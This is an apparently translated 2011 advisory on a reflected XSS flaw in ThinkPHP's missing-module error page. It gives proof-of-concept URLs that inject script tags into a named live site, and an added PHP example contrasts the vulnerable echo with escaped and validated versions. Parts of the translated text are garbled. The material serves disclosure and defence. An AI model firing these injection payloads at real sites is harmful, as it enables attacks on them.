ThinkPHP development framework XSS vulnerability warning - the black bar safety net

2011-12-26T00:00:00
ID MYHACK58:62201132721
Type myhack58
Reporter Anonymous
Modified 2011-12-26T00:00:00

Description

Brief description: The open source PHP development framework has an XSS vulnerability by default, so all systems developed with the framework have the XSS vulnerability.

Detailed description: The error raised when a module does not exist is not handled properly, leading to an XSS vulnerability.

Proof of vulnerability:

Tested against Super Rangers:

http://i.sucop.com/?m='"><script>alert(3);</script><"&a=login

http://i.sucop.com/index.php?m='"><script>alert(0 2 1 4 5 5 9);</script><"&a=help&


Go and see

Solution: set a is better than filter it~~~

Author Hxai11
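
The flaw described above, an unknown module name from the `m` parameter being echoed into the error page, is shown here beside two fixes: output encoding and name validation. This is an added example, not ThinkPHP's own code and not part of the original advisory; the function names and the module list are hypothetical.

```php
<?php
// Added illustration; NOT ThinkPHP source. All function names are hypothetical.

const KNOWN_MODULES = ['Index', 'User']; // constructed sample module list

// Vulnerable pattern: the unknown module name is copied into the error page as-is.
function renderErrorVulnerable(string $module): string
{
    return '<p class="error">Module does not exist: ' . $module . '</p>';
}

// Hardened: encode for the HTML context at output time.
function renderErrorEscaped(string $module): string
{
    $safe = htmlspecialchars($module, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p class="error">Module does not exist: ' . $safe . '</p>';
}

// Hardened dispatcher: check the name's shape first and never echo rejected input.
function dispatch(string $module): string
{
    if (!preg_match('/\A[A-Za-z][A-Za-z0-9_]{0,63}\z/', $module)) {
        return '<p class="error">Invalid module name.</p>';
    }
    if (!in_array($module, KNOWN_MODULES, true)) {
        return renderErrorEscaped($module);
    }
    return '<p>Dispatching to ' . htmlspecialchars($module, ENT_QUOTES, 'UTF-8') . '</p>';
}

// The value of "m" from the first proof-of-concept URL on this page.
$m = '\'"><script>alert(3);</script><"';

echo renderErrorVulnerable($m), PHP_EOL; // script tag reaches the browser intact
echo renderErrorEscaped($m), PHP_EOL;    // markup is rendered as inert text
echo dispatch($m), PHP_EOL;              // rejected before any reflection
echo dispatch('Blog'), PHP_EOL;          // well-formed but unknown: escaped error
```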